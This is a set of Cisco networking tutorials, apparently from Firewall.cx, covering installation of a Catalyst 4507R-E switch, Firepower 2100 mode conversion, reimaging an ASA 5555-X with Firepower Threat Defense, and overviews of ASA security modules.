We carefully unwrapped the contents always using our antistatic wrist-strap so that we don't damage the card, and then placed it on top of its box:

[Image: tk-cisco-switches-install-4507r-13]

The card has an impressive quantity of heatsinks, two of which are quite large and must therefore dissipate a lot of heat. The backplane connector is visible with its white colour (back left corner), and right behind the 48 ports is an area covered with a metallic housing. This attracted our attention as we thought something very sensitive must be in that area for Cisco to protect it in such a way.

Taking a look under the protective shield we found a PCB board that ran along the length of the board:

[Image: tk-cisco-switches-install-4507r-14]

Our understanding is that this rail of PCB, with transistors and other electrical circuits mounted on it, contains the regulators for the PoE support. Taking into consideration that we didn't see the same protection on other similar non-PoE boards, we couldn't imagine it being anything else.

When we completed our checkup, we decided it was time to install the card and finally power the 4507R-E switch.

[Image: tk-cisco-switches-install-4507r-15]

The picture above shows our 4507R-E installed with two Supervisor Engine II-Plus engines in active-standby redundancy mode and one 48 port Gigabit Ethernet card with PoE support.

On top is the editor's (Chris Partsenidis) laptop with a familiar website loaded, Firewall.cx!

Configuring the Supervisor engines was a simple task. When the 4507R-E is powered on, both engines boot by first performing a POST test on their modules, memory buffers etc. When this internal POST phase is successfully completed without errors, the engines begin to boot the IOS.

The screenshot below shows the described procedure from one Supervisor engine, since you can't monitor both engines unless you have a serial port connected to each supervisor's console port:

[Image: tk-cisco-switches-install-4507r-16]

As shown above, the Supervisor engine passed all tests and then proceeded to boot the IOS.

Once loaded, the IOS will check for the existence of a second Supervisor engine, establish connection with it and, depending on which slot it is located in, it will automatically initialise the second engine in standby mode as shown below:

[Image: tk-cisco-switches-install-4507r-17]

 Once the Supervisor engine bootup process is complete, you are able to configure any aspect of the switch according to your needs, just as you would with any other Cisco Catalyst switch. The interesting part is when you try to save your configuration:

[Image: tk-cisco-switches-install-4507r-18]

In the above screenshot, we've configured the switch to boot using a specific IOS image located in the bootflash. As soon as we saved the configuration using the wr command, the Supervisor engine automatically synchronised the two engines' NVRAM without any additional commands. This excellent functionality makes sure that whatever configuration is applied to the active Supervisor engine will be available to the standby engine should the first one fail.
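
For reference, the relevant configuration steps typically look similar to the following - the IOS filename shown is purely illustrative and should match the image actually present in bootflash:

4507R-E(config)# boot system flash bootflash:cat4500-ipbase-mz.122-25.EWA.bin
4507R-E(config)# end
4507R-E# wr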

The great part of this switch is that you can obtain any type of information you require from it. For example, we switched off one of the two power supplies and executed the show modules command. This command gives a report of the installed modules (cards) in the catalyst switch along with a few more details:

[Image: tk-cisco-switches-install-4507r-19]

The command reveals that the backplane power consumption is approximately 40 Watts, followed by a detailed report of the installed modules. In our example, you can see the two Supervisor engines in slots 3 & 4, followed by the 48 port Gigabit Ethernet module in slot 5. The command also shows the Supervisor engines' configured redundancy operating mode and status. Lastly, any system failures are reported at the end - this output shows that we've got a problem with one of the power supplies, but rest assured, we had simply switched it off to see if it was going to show up in the report!

Summary

This article covered the initial installation and setup of a new Cisco Catalyst 4507R-E switch, populated with two Supervisor Engine II-Plus modules and a 48 port Gigabit module with PoE support. We saw areas of the switch which you won't easily find elsewhere, and our generous amount of pictures made sure you understood what the 4507R-E looks like, inside and out! Lastly, we saw the switch bootup procedure and the Supervisor engine POST test and synchronization process.


Converting Cisco Firepower from Platform mode to Appliance mode. Full ASA Backup with ASDM

This article explains how to configure a Cisco Firepower 2100 series device to operate in Appliance mode. We’ll show you how to switch from Platform mode to Appliance mode and how the device will automatically convert and retain your ASA configuration.

Before performing the conversion, it's important to obtain a full backup of the Firepower system; we therefore also cover how to back up your Cisco Firepower appliance configuration, certificates, VPN configuration (including pre-shared keys), VPN profiles and more, using the Cisco Adaptive Security Device Manager (ASDM).


More in-depth technical articles can be found in our Cisco Firewall section.

Cisco Firepower Platform and Appliance Mode

The Cisco Firepower 2100 series operates on an underlying system called FXOS. You can run the Firepower 2100 for ASA in two modes:

  • Platform Mode: In this mode, you need to configure basic operating parameters and hardware interface settings within FXOS. This includes tasks like enabling interfaces, setting up EtherChannels, managing NTP, and handling image management. You can use either the chassis manager web interface or the FXOS CLI for these configurations. Afterward, you can set up your security policy in the ASA operating system using ASDM or the ASA CLI.
  • Appliance Mode (Default): This mode allows you to configure all settings directly in the ASA. Only advanced troubleshooting commands are available through the FXOS CLI in this mode. Appliance mode is similar to how the old ASA Firewalls (5500 series) ran when the FXOS didn’t exist.

The Management 1/1 interface is used to manage the Firepower device. The interface is configured with two IP addresses, one for the FXOS and one for the ASA. When changing to Appliance mode, the FXOS IP address is lost and will need to be reconfigured; however, you can connect to the FXOS directly from the ASA software using the following command:
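
The command itself falls outside this excerpt; on a Firepower 2100 running in Appliance mode the connection is typically made from the ASA CLI along the following lines (treat this as an assumption and verify against the release notes for your FXOS/ASA version):

ciscoasa# connect fxos admin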




Cisco ASA Firepower Threat Defense (FTD): Download and Installation/Setup ASA 5500-X. FTD Management Options

One Appliance – One Image is what Cisco is targeting for its Next Generation Firewalls. With this vision, Cisco has created a unified software image named “Cisco Firepower Threat Defense”. In this FirePOWER series article we’ll cover the installation of Firepower Threat Defense (FTD) on a Cisco ASA 5500-X series security appliance. We’ll also explain the management options available: the Firepower Management Center (FMC), which is the old FireSIGHT, and the Firepower Device Manager (FDM).

Cisco Firepower Threat Defense (FTD) is a unified software image, combining Cisco ASA and Cisco FirePOWER Services features, that can be deployed on the Cisco Firepower 4100 and Firepower 9300 Series appliances as well as on the ASA 5506-X, ASA 5506H-X, ASA 5506W-X, ASA 5508-X, ASA 5512-X, ASA 5515-X, ASA 5516-X, ASA 5525-X, ASA 5545-X, and ASA 5555-X. However, at the time of writing, the Cisco Firepower Threat Defense (FTD) unified software cannot be deployed on Cisco ASA 5505 and 5585-X Series appliances.

Understanding Cisco Firepower Threat Defense Management & Capabilities

Simplifying management and operation of Cisco’s Next Generation Firewalls is one of the primary reasons Cisco is moving to a unified image across its firewall appliances.

Currently the Firepower Threat Defense can be managed through the Firepower Device Manager (similar to Cisco’s ASDM) and the Firepower Management Center (analyzed below).


Managing Options for FirePOWER Services and Firepower Threat Defense (FTD)

It should be noted that the Firepower Device Manager software is under extensive development and is not currently capable of supporting all configuration options. For this reason it’s best to rely on the Firepower Management Center to manage the Cisco Firepower Threat Defense system.

The Firepower Management Center, also known as FMC or FireSIGHT, is available as a dedicated server or virtual image appliance (Linux based VM server) that connects to the FirePOWER or Firepower Threat Defense and allows you to fully manage either system. Organizations with multiple Firepower Threat Defense systems or FirePOWER Services would register and manage them from the FMC.
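
For reference, registering an FTD device with the FMC is normally initiated from the FTD CLI using the configure manager add command; a hedged sketch is shown below, where the FMC IP address and registration key are placeholders for your own values:

> configure manager add 10.32.4.160 MyRegKey123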

Alternatively, users can manage the Firepower Threat Defense (FTD) device using the Firepower Device Manager (FDM) – the concept is similar to ASDM.

Currently the latest Cisco Firepower Threat Defense (FTD) unified software image available is version 6.2.x.

The Cisco Firepower Threat Defense is continually expanding the Next-Generation Firewall Services it supports, which currently include:

  • Stateful Firewall Capabilities
  • Static and Dynamic Routing. Supports RIP, OSPF, BGP, Static Routing
  • Next-Generation Intrusion Prevention Systems (NGIPS)
  • URL Filtering
  • Application Visibility and Control (AVC)
  • Advanced Malware Protection (AMP)
  • Cisco Identity Service Engine (Cisco ISE) Integration
  • SSL Decryption
  • Captive Portal (Guest Web Portal)
  • Multi-Domain Management
  • Rate Limiting
  • Tunnelled Traffic Policies
  • Site-to-Site VPN. Only supports Site-to-Site VPN between FTD appliances and FTD to ASA
  • Multicast Routing
  • Shared NAT
  • Limited Configuration Migration (ASA to Firepower TD)

While the Cisco Firepower Threat Defense is being actively developed and populated with some great features, we feel that it’s too early to place it in a production environment. There are some stability issues, at least with the FTD image on the ASA platform, which should be ironed out with the newer software releases.

If you are already in the process of installing FTD on your ASA then you should heavily test it before rolling it out to production.

Due to the issues encountered, we were forced to remove the FTD installation by reimaging our ASA 5555-X Appliance with Cisco ASA and FirePOWER Services images. We believe the “Cisco Firepower Threat Defense” unified software image is very promising but requires some more time to reach a more mature and stable version.

Problems/Limitations Encountered With Cisco Firepower Threat Defense

While small deployments might be able to overcome the absence of many desired features (e.g. IPsec VPN support), enterprise environments will certainly find it more challenging.

Depending on the environment and installation requirements, customers will stumble into different limitations or issues. For example, on our ASA 5555-X we had major delays trying to push new policies from the Firepower Management Center (FMC) to the newly imaged FTD ASA. With a total of just 5 policies implemented, it took over 2 minutes to deploy them from the FMC to the FTD.

We also found that we were unable to configure any EtherChannel interfaces. This is considered a major drawback, especially for organizations with multiple DMZ zones and high-bandwidth traffic requirements. Cisco has an official announcement regarding this limitation.

In addition to the above, when we completed the conversion of our ASA to the FTD software we needed to open a TAC Service Request in order to transfer our ASA license to the FTD image, adding unnecessary overhead and confusion. We believe this should have been done automatically during the installation process.

Cisco ASA Firepower Threat Defense (FTD) Installation – Quick Overview

Reimaging the Cisco ASA 5555-X Appliance to install the Cisco Firepower Threat Defense image is fairly simple once you understand what needs to be done. Here are the steps in the order they must be executed:

Download the Cisco Firepower Threat Defense Boot & System Image

Using a valid CCO account that has the necessary software download privileges, visit: Downloads Home > Products > Security > Firewalls > Next-Generation Firewalls (NGFW) > ASA 5500-X with FirePOWER Services and select Firepower Threat Defense Software:


Downloading Cisco ASA 55xx Firepower Threat Defense software

Alternatively click on the following URL: Firepower Threat Defense Software Download

Next, select and download the latest boot image and system version. In our example this is version 6.2.0:


Downloading the latest Firepower Threat Defense System and Boot Image

Reboot ASA, Break The Startup/Boot Sequence

When ready, reboot the ASA appliance. During the boot process hit Break or Esc to interrupt the boot:

It is strongly recommended that you have a complete backup of your ASA configuration and software before proceeding with the next steps, which will erase the configuration and all files.

Rebooting... Cisco BIOS Version:9B2C109A
Build Date:05/15/2013 16:34:44
CPU Type: Intel(R) Xeon(R) CPU X3460 @ 2.80GHz, 2793 MHz
Total Memory:16384 MB(DDR3 1333)
System memory:619 KB, Extended Memory:3573 MB
……. <output omitted>
Booting from ROMMON
Cisco Systems ROMMON Version (2.1(9)8) #1: Wed Oct 26 17:14:40 PDT 2011
Platform ASA 5555-X with SW, 8 GE Data, 1 GE Mgmt
Use BREAK or ESC to interrupt boot.
Use SPACE to begin boot immediately.
Boot in 10 seconds.

Boot interrupted.
Management0/0
Link is DOWN
MAC Address: 00f6.63da.e807
Use ? for help.
rommon #1>

At this point we have successfully interrupted the boot process and can proceed to the next step. 

Upload the Boot Image and Boot the ASA Firewall

We now need to configure the necessary parameters on the ASA Firewall to download the Cisco Firepower Threat Defense Boot Image. Ensure you have an FTP/TFTP server installed and configured to allow the Firewall to download the image/system files.

Now connect to the ASA console port using a terminal access application, e.g. Putty, configured with the following serial port settings:

  • 9600 baud
  • 8 data bits
  • No parity
  • 1 stop bit
  • No flow control

Ensure the Cisco ASA 5500-X appliance is running rommon version 1.1.8 or greater by using the IOS command show module, to ensure re-imaging will be successful. If the rommon version is earlier than 1.1.8, then the ASA appliance needs a rommon upgrade.

ciscoasa# show module
.. output omitted…
Mod    MAC Address Range                Hw Version     Fw Version     Sw Version
---- --------------------------------- ------------ ------------ ---------------
1       7426.aceb.ccea to 7426.aceb.ccf2    0.3          1.1.8           9.6(1)
sfr     7426.aceb.cce9 to 7426.aceb.cce9    N/A         N/A

Next, configure the ASA Firewall with the necessary network settings/variables so it can access the image and system files previously downloaded. The ASA 5555-X firewall uses a built-in management interface, hence there is no need to specify the management interface.

rommon #1> address 10.32.4.129
rommon #2> server 10.32.4.150
rommon #3> gateway 10.32.4.150
rommon #4> file ftd-boot-9.7.1.0.cdisk
rommon #5> set
ROMMON Variable Settings:
 ADDRESS=10.32.4.129
 SERVER=10.32.4.150
 GATEWAY=10.32.4.150
 PORT=Management0/0
 VLAN=untagged
 IMAGE=ftd-boot-9.7.1.0.cdisk
 CONFIG=
 LINKTIMEOUT=20
 PKTTIMEOUT=4
 RETRY=20

Explanation of commands:

- Address: The IP address of the ASA Firewall
- Server: The TFTP server from which the ASA will download the image
- Gateway: The IP address of the network gateway. Mandatory even if the TFTP server is within the same logical network
- File: The name of the boot image file
- Set: Shows the current rommon variable settings

The Sync command will save the NVRAM parameters, effectively “enabling” the configuration changes. It’s advisable to try and ping the TFTP server. This will not only confirm the TFTP server is reachable but also populate the ARP table of the ASA Firewall:

rommon #6> sync
Updating NVRAM Parameters...

rommon #7> ping 10.32.4.150
Sending 20, 100-byte ICMP Echoes to 10.32.4.150, timeout is 4 seconds:
?!!!!!!!!!!!!!!!!!!!
Success rate is 95 percent (19/20)

When ready, issue the tftpdnld command to initiate the download of the boot image to the ASA Firewall. Once downloaded the system will automatically boot the image file:

rommon #7> tftpdnld
ROMMON Variable Settings:
ADDRESS=10.32.4.129
SERVER=10.32.4.150
GATEWAY=10.32.4.150
PORT=Management0/0
VLAN=untagged
IMAGE=ftd-boot-9.7.1.0.cdisk
CONFIG=
LINKTIMEOUT=20
PKTTIMEOUT=4
RETRY=20

tftp ftd-boot-9.7.1.0.cdisk@10.32.4.150 via 10.32.4.150
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Received 107292672 bytes

Launching TFTP Image...

Execute image at 0x14000

Cisco Security Appliance admin loader (3.0) #0: Mon Jan 16 09:01:33 PST 2017
Platform ASA5555

Loading...
IO memory blocks requested from bigphys 32bit: 125055
INIT: version 2.88 booting

Starting udev
Configuring network interfaces... done.
Populating dev cache
Found device serial number FCH2023J78M.
Found USB flash drive /dev/sdc
Found hard drive(s): /dev/sda /dev/sdb
fsck from util-linux 2.23.2
dosfsck 2.11, 12 Mar 2005, FAT32, LFN
There are differences between boot sector and its backup.
Differences: (offset:original/backup)
65:01/00
Not automatically fixing this.
/dev/sdc1: 62 files, 825465/2011044 clusters
Launching boot CLI ...
Configuring network interface using DHCP
Bringing up network interface.
Depending on your network, this might take a couple of minutes when using DHCP...
ifup: interface lo already configured
Using IPv6 address: fe80::2f6:63ff:feda:e807
IPv4 address not assigned. Run 'setup' before installation.
INIT: SwitchingStarting system message bus: dbus.
Starting OpenBSD Secure Shell server: sshd
generating ssh RSA key...
generating ssh ECDSA key...
generating ssh DSA key...
Could not load host key: /etc/ssh/ssh_host_ed25519_key
done.
Starting Advanced Configuration and Power Interface daemon: acpid.
acpid: starting up
acpid: 1 rule loaded
acpid: waiting for events: event logging is off

Starting ntpd: done
Starting syslog-ng:[2017-03-16T04:08:41.437297] Connection failed; fd='15', server='AF_INET(127.128.254.1:514)', local='AF_INET(0.0.0.0:0)', error='Network is unreachable (101)'
[2017-03-16T04:08:41.437321] Initiating connection failed, reconnecting; time_reopen='60'
.
Starting crond: OK

      Cisco FTD Boot 6.0.0 (9.7.1.)
      Type ? for list of commands
FIREWALLCX-boot>

Optionally, you can ping the TFTP/FTP server to confirm there is still connectivity with the server:

FIREWALLCX-boot> ping 10.32.4.150
PING 10.32.4.150 (10.32.4.150) 56(84) bytes of data.
64 bytes from 10.32.4.150: icmp_seq=1 ttl=128 time=0.722 ms
64 bytes from 10.32.4.150: icmp_seq=2 ttl=128 time=0.648 ms
64 bytes from 10.32.4.150: icmp_seq=3 ttl=128 time=0.856 ms
--- 10.32.4.150 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2018ms
rtt min/avg/max/mdev = 0.648/0.742/0.856/0.086 ms

Install Firepower Threat Defense System Software 

At this point our Firewall has successfully downloaded and booted the boot image and is ready to accept the system image. At the prompt, type setup and follow the prompts. The setup process will gather important configuration parameters for the FTD device such as hostname, IP address, subnet mask, gateway, DNS servers and more.

Many of the configuration questions involve a yes/no answer. The default value, selected when you leave the parameter blank and hit Enter, is shown in square brackets [ ]:

FIREWALLCX-boot> setup

                      Welcome to Cisco FTD Setup
                      [hit Ctrl-C to abort]
                      Default values are inside []

Enter a hostname [FIREWALLCX]: FIREWALLCXFTD
Do you want to configure IPv4 address on management interface?(y/n) [Y]: y
Do you want to enable DHCP for IPv4 address assignment on management interface?(y/n) [Y]: n
Enter an IPv4 address: 10.32.4.129
Enter the netmask: 255.255.255.0
Enter the gateway: 10.32.4.150
Do you want to configure static IPv6 address on management interface?(y/n) [N]: n
Stateless autoconfiguration will be enabled for IPv6 addresses
Enter the primary DNS server IP address: 10.32.4.150
Do you want to configure Secondary DNS Server? (y/n) [n]: n
Do you want to configure Local Domain Name? (y/n) [n]: y
Enter the local domain name: firewall.cx
Do you want to configure Search domains? (y/n) [n]: n
Do you want to enable the NTP service? [Y]: n
Please review the final configuration:

Hostname:                             FIREWALLCXFTD
Management Interface Configuration

IPv4 Configuration:                 static
           IP Address:                 10.32.4.129
           Netmask:                    255.255.255.0
           Gateway:                    10.32.4.150

IPv6 Configuration:                 Stateless autoconfiguration
DNS Configuration:
           Domain:                      firewall.cx
           DNS Server:                10.32.4.150

NTP configuration:                   Disable

CAUTION:
You have selected IPv6 stateless autoconfiguration, which assigns a global address
based on network prefix and a device identifier. Although this address is unlikely
to change, if it does change, the system will stop functioning correctly.
We suggest you use static addressing instead.

Apply the changes?(y,n) [Y]: Y
Configuration saved successfully!
Applying...
Restarting network services...
Done.
Press ENTER to continue...

At this point the appliance’s initial configuration phase is complete and it is ready to begin downloading the FTD system image.

To initiate the image download, use the system install ftp://10.32.4.150/ftd-6.2.0-362.pkg command, replacing the IP address portion with your FTP server’s IP address.

During the installation, the process will ask for the necessary credentials to authenticate to the FTP server. Right before the point of no return, the system will ask for a final confirmation before erasing the appliance’s disk and initiating the upgrade. When the system image installation is complete, you will be prompted to press Enter to reboot.

Unnecessary output, e.g. progress dots (….), has been removed from the log below to make it easier to read and understand.

FIREWALLCX-boot> system install ftp://10.32.4.150/ftd-6.2.0-362.pkg

######################## WARNING ############################
# The content of disk0: will be erased during installation! #
#############################################################

Do you want to continue? [y/N]: y
Erasing disk0 ...
Extracting ...
Verifying. …

Enter credentials to authenticate with ftp server
Username: firewallcx
Password: $etmeup!
Verifying. ... ...
Downloading. … ...
Extracting. … …

Package Detail
           Description:                  Cisco ASA-FTD 6.2.0-362 System Install
           Requires reboot:           Yes

Do you want to continue with upgrade? [y]: y
Warning: Please do not interrupt the process or turn off the system.
Doing so might leave system in unusable state.

Starting upgrade process .... ….. ….
Populating new system image. ….. ….

Reboot is required to complete the upgrade. Press 'Enter' to reboot the system.

Broadcast message from root@FIREWALLCXFTD (ttyS0) (Thu Mar 16 05:46:03 2017):
The system is going down for reboot NOW!

The ASA FTD Appliance will now reboot. While this process is underway you will see a lot of information during shutdown and startup. When booting into the FTD system image for the first time it is normal to see a number of error/warning messages – do not be alarmed.

When the system has successfully booted, log in using the default username (admin) and password (cisco123). You will then be asked to press Enter to display Cisco’s EULA, which must be accepted at the end by pressing Enter again or typing YES:

Cisco ASA5555-X Threat Defense v6.2.0 (build 362)
firepower login: admin
Password: cisco123
You must accept the EULA to continue.
Press <ENTER> to display the EULA:
END USER LICENSE AGREEMENT
IMPORTANT: PLEASE READ THIS END USER LICENSE AGREEMENT CAREFULLY.
……………………………………..
Product warranty terms and other information applicable to Cisco products are
available at the following URL: http://www.cisco.com/go/warranty.

Please enter 'YES' or press <ENTER> to AGREE to the EULA: YES

Finally, the last step involves changing the default admin password and reconfiguring the system’s network settings.

While it might seem repetitive to configure the network settings three times across the FTD boot image and system image installation, this allows companies to perform these preparation tasks in an isolated environment, e.g. a lab room, so the device is ready for its final deployment in the production environment.

Similar to the previous steps, pressing enter will accept the default value shown between the brackets [ ]:

System initialization in progress. Please stand by.
You must change the password for 'admin' to continue.
Enter new password: $etmeup!
Confirm new password: $etmeup!
You must configure the network to continue.
You must configure at least one of IPv4 or IPv6.
Do you want to configure IPv4? (y/n) [y]: y
Do you want to configure IPv6? (y/n) [n]: n
Configure IPv4 via DHCP or manually? (dhcp/manual) [manual]: manual
Enter an IPv4 address for the management interface [192.168.45.45]: [enter]
Enter an IPv4 netmask for the management interface [255.255.255.0]: [enter]
Enter the IPv4 default gateway for the management interface [data-interfaces]: [enter]
Enter a fully qualified hostname for this system [firepower]: firewall.cx
Enter a comma-separated list of DNS servers or 'none' [208.67.222.222,208.67.220.220]: [enter]
Enter a comma-separated list of search domains or 'none' []:[enter]
If your networking information has changed, you will need to reconnect.

DHCP server is enabled with pool: 192.168.45.46-192.168.45.254. You may disable with configure network ipv4 dhcp-server-disable
For HTTP Proxy configuration, run 'configure network http-proxy'

Manage the device locally? (yes/no) [yes]: yes
Configuring firewall mode to router
Update policy deployment information
- add device configuration
Successfully performed firstboot initial configuration steps for Firepower Device Manager for Firepower Threat Defense.
>

The greater-than “>” symbol indicates the FTD setup is complete and running.
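As a quick optional check (not part of the original output and shown purely for illustration), the installed FTD version and platform can be confirmed directly from this prompt:

> show version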

More information on the Cisco Firepower Threat Defense, including Installation and Upgrade Guides, can be found at the following Cisco URL:

https://www.cisco.com/c/en/us/support/security/firepower-ngfw/products-installation-guides-list.html

You can now log into the Cisco Firepower Device Manager by entering the ASA Firewall appliance IP address in your web browser:

Cisco Firepower Device Manager Login Screen
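For example, assuming the management IP address configured earlier in this guide (substitute your own), the Firepower Device Manager is reached over HTTPS:

https://192.168.45.45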

Once logged in, you can follow the step-by-step Device Setup Wizard that will take you through the necessary steps to initially configure your new ASA FTD device:

Device Setup Page of Cisco FTD

Experienced Firepower Threat Defense users can click on the Skip device setup link located on the lower area of the screen.

Summary

Cisco’s Firepower Threat Defense (FTD) is the Next-Generation Firewall solution that will eventually replace the well-known ASA software. While FTD is still in its early years, it is rapidly being adopted by organizations across the globe. It is important to understand the current limitations of FTD before moving it into a production environment. For example, important features such as site-to-site VPN are not currently supported; on the other hand, FTD offers a clean and intuitive GUI.

For many, installing Cisco’s Firepower Threat Defense on an ASA Firewall appliance can be a confusing task. Our Cisco Firepower Threat Defense (FTD) installation guide has been designed to simplify the process by providing step-by-step instructions presented in an easy-to-understand format while also covering Cisco Firepower Threat Defense management options.


Cisco ASA 5500-X Series Firewall with IPS, ASA CX & FirePower Services. Application Visibility and Control (AVC), Web Security, Botnet Filtering & IPS / IDS, Firepower Threat Defense

The Cisco ASA Firewall 5500-X series has evolved from the previous ASA 5500 Firewall series, designed to protect mission critical corporate networks and data centers from today’s advanced security threats.

Through sophisticated software and hardware options (modules), the ASA 5500-X series Firewalls support a number of greatly advanced next-generation security features that set them apart. These include:

  • Cisco Intrusion Prevention System (IPS) services. A signature based IPS solution offered as a software or hardware module depending on the ASA 5500-X appliance model.
  • Cisco ASA CX Context-aware services. A software module for ASA 5500-X appliances except the ASA 5585-X where it’s offered as a hardware module. Provides IPS services, Application Visibility and Control (AVC), web security and botnet filtering.
  • Cisco FirePOWER Services. Cisco’s latest software & hardware threat protection, superseding previous technologies by combining IPS and CX services plus full contextual awareness of users, infrastructure, applications and content, URL filtering with advanced malware protection (AMP). Offered as a software module for 5500-X series appliances except the 5585-X, which requires a dedicated hardware module. Note that FirePOWER services run in parallel with the classical ASA software.
  • Cisco Firepower Threat Defense (FTD). This is the next step after the FirePOWER services, released by Cisco in 2015. While FirePOWER services run alongside the classic Cisco ASA software, the newer Firepower Threat Defense combines the Cisco ASA software and FirePOWER services in one software package. This is also the concept behind the newer Firepower appliances (e.g. the 4100 & 9000 series), which run the Firepower Threat Defense software. At this point, Firepower Threat Defense is under continuous development and does not yet support many features offered by the classic ASA software. For example, at the time of writing, site-to-site IPsec VPN is still not available.

Our previous article examined Cisco’s ASA 5500 series Firewall hardware modules, which include the Content Security CSC-SSM and the Intrusion Prevention System (IPS) / Intrusion Detection System (IDS) AIP-SSC / AIP-SSM modules. While these solutions are no longer sold by Cisco, they have been widely deployed in data centers and corporate networks around the world and will be supported by Cisco until 2018.

Note: To download datasheets containing technical specifications and features offered by the Cisco 5500-X Series Firewalls with FirePOWER, IPS and CX Context-aware services, visit our Cisco ASA 5500 & 5500-X Series Adaptive Security Appliances Download Section.

Since Cisco’s announcement back in 2013 regarding the discontinuation of its ASA 5500 series firewall appliances in favour of the newer 5500-X Next Generation Firewalls, customers have been contemplating when to upgrade to the newer 5500-X series. Given the fact that Cisco is no longer providing major firmware upgrades to the older ASA 5500 series and the appearance of new advanced security threats and malware (e.g ransomware), it is now considered imperative to upgrade to the newer platform so that security is maintained at the highest possible level.

Customers seeking advanced protection are likely to consider expanding their ASA Firewall capabilities with the purchase of an IPS module, CX Context-aware or FirePOWER services.


Figure 1. The Cisco FirePOWER hardware module for the ASA-5585-X Firewall

Cisco’s FirePOWER advanced security threat protection solution was introduced late 2014 and its purpose is to replace the current ASA 5500-X IPS and ASA CX 5500-X Context-aware offerings.

The diagram below shows key security features provided by most Cisco ASA Firewall appliances. Features such as Clustering, High Availability, Network profiling, Identity-Policy Control, VPN and advanced access lists have until today been fairly standard offerings across the ASA Firewall series, however, the newer 5500-X can now offer the additional FirePOWER services marked in red below:


Figure 2. Cisco FirePOWER services (marked in red) provide advanced key security features to ASA Firewalls

Cisco’s FirePOWER solution has the ability not only to provide advanced zero-day IPS threat protection, but also to deliver exceptional security & firewalling services such as Application Visibility & Control, FirePower Analytics & Automation, Advanced Malware Protection (AMP) & Sandboxing, plus Web-based URL filtering, all in one box.

While most of these additional FirePOWER services are subscription based, meaning companies will need to fork out additional money, they do offer significant protection and control and help to reduce administrative complexity.

Customers utilizing Cisco’s Intrusion Prevention System (IPS) or FirePOWER services also have the option of the Cisco FireSIGHT Management Center – a solution used to centrally manage network security. Cisco’s FireSIGHT allows network administrators, security engineers and IT Managers to monitor events, analyse incidents, obtain detailed reporting and much more, from a single intuitive web-interface.

Figure 3. The Cisco FireSIGHT Management Center Graphical Interface

It’s evident that Cisco is marketing its ASA 5500-X series with FirePOWER services as its flagship network security & threat protection solution, which is why Firewall.cx will be covering the Cisco FirePOWER & FireSIGHT Management Center configuration in great depth in upcoming articles.


Cisco ASA 5500 Series Firewall Modules & Cards – Content Security (CSC-SSM), IPS - IDS (AIP SCC & AIP SSM) Hardware Modules

Cisco’s Adaptive Security Appliance (ASA) Firewalls are one of the most popular and proven security solutions in the industry. Since the introduction of the PIX and ASA Firewall into the market, Cisco has been continuously expanding its firewall security features and intrusion detection/prevention capabilities to adapt to the evolving security threats while integrating with other mission-critical technologies to protect corporate networks and data centers.

In recent years, we’ve seen Cisco tightly integrate separate security technologies such as Intrusion Prevention Systems (IPS) and Intrusion Detection Systems (IDS) within the ASA Firewall appliances in the form of hardware module add-ons (older 5500 series & newer 5500-X series) and, recently, software modules supported only by the newer ASA 5500-X series security appliances.

With the addition of a software or hardware module, customers are able to increase the firewall’s security and protection capabilities while at the same time simplifying security management and administration by dealing with a single firewall device instead of multiple firewall, IPS or IDS devices.

While this article covers the hardware modules available for the Cisco ASA 5500 Firewall series, upcoming articles will cover both software and hardware modules along with Cisco FirePOWER & FireSIGHT management services for the newer ASA 5500-X series.

Note: The Cisco ASA 5500 series hardware modules for ASA-5505, ASA 5510, ASA 5520 & ASA 5540 have been announced as End-of-Sale & End-of-Life. Modules below are no longer sold or supported by Cisco. Last day of support was 30th of September 2018.

Users interested in the newer ASA 5500-X IPS, Context-Aware and FirePOWER services can read our article Cisco ASA 5500-X Series Firewall with IPS, ASA CX & FirePower Services. Application Visibility and Control (AVC), Web Security, Botnet Filtering & IPS / IDS.

Hardware Modules For ASA 5500 Series Firewalls

The ASA 5500 series Firewalls (ASA-5505, ASA 5510, ASA 5520, ASA 5540 etc) were the first security appliances with the capability to integrate hardware modules for enhanced security and threat protection.

To help target different markets and security requirements, Cisco split its hardware module offerings into two distinct categories:

  • Content Security and Control Security Services (CSC-SSM)
  • Advanced Inspection and Prevention Security Services (AIP-SSC & AIP-SSM)

Each hardware module card is equipped with its own CPU, RAM and Flash storage space, running a separate operating system that integrates with the ASA Firewall via its internal network ports.

Let’s take a brief look at each category.

The Content Security & Control Security Services Modules

The Content Security and Control Security Services module aims to cover corporate environments where comprehensive malware protection, advanced content filtering (including web caching, URL filtering and anti-phishing) and anti-spam filtering are required. This all-in-one hardware module solution is capable of providing a wealth of security and control capabilities essential for networks of all sizes.

Following are the hardware modules supporting Content Security and Control Security Services:

  • CSC-SSM-10: For ASA 5510 & ASA 5520. Initial support for 50 users, upgradable up to 500 users
  • CSC-SSM-20: For ASA 5510, ASA 5520 & ASA 5540. Initial support for 500 users, upgradable up to 1000 users

The CSC-SSM-10 & CSC-SSM-20 modules look identical. Shown below is the CSC-SSM-20 module:

Figure 1. The Cisco CSC-SSM-20 hardware module for the ASA 5500 series Firewalls

Users requiring additional information on the Cisco CSC-SSM modules, including features, hardware specifications, licenses, and support contracts (Smartnet), can download the Cisco ASA 5500 Series Content Security and Control Security Services datasheet from our Cisco ASA 5500 Product Datasheets and Guides download section.

The Advanced Inspection & Prevention Security Services Modules

The Advanced Inspection and Prevention Security Services modules combine IPS and IDS threat protection with mitigation services aiming to protect and stop malicious traffic before it can affect the network. Updates for the modules occur up to every 5 minutes, ensuring real-time updates and effective protection from zero-day attacks.

Cisco ASA Firewall customers can choose between the following Advanced Inspection and Prevention Security Service modules depending on their ASA hardware platform:

  • AIP SSC-5: For ASA 5505. 1 Virtual sensor. 75Mbps concurrent threat mitigation throughput.
  • AIP SSM-10: For ASA 5510 & ASA 5520. 4 Virtual sensors. Up to 225Mbps concurrent threat mitigation throughput depending on ASA model.
  • AIP SSM-20: For ASA 5520 & ASA 5540. 4 Virtual sensors. Up to 500Mbps concurrent threat mitigation throughput depending on ASA model.
  • AIP SSM-40: For ASA 5520 & ASA 5540. 4 Virtual sensors. Up to 650Mbps concurrent threat mitigation throughput depending on ASA model.

Figure 2. The Cisco ASA Firewall AIP SSC-5, AIP SSM-20 and AIP SSM-40 IPS hardware modules

Users requiring additional information on the Cisco AIP SSC-5 & AIP-SSM modules, including features, hardware specifications, licenses, and support contracts (Smartnet), can download the Cisco ASA 5500 Series Advanced Inspection and Prevention Security Services module and card datasheet from our Cisco ASA 5500 Product Datasheets and Guides download section.

Summary

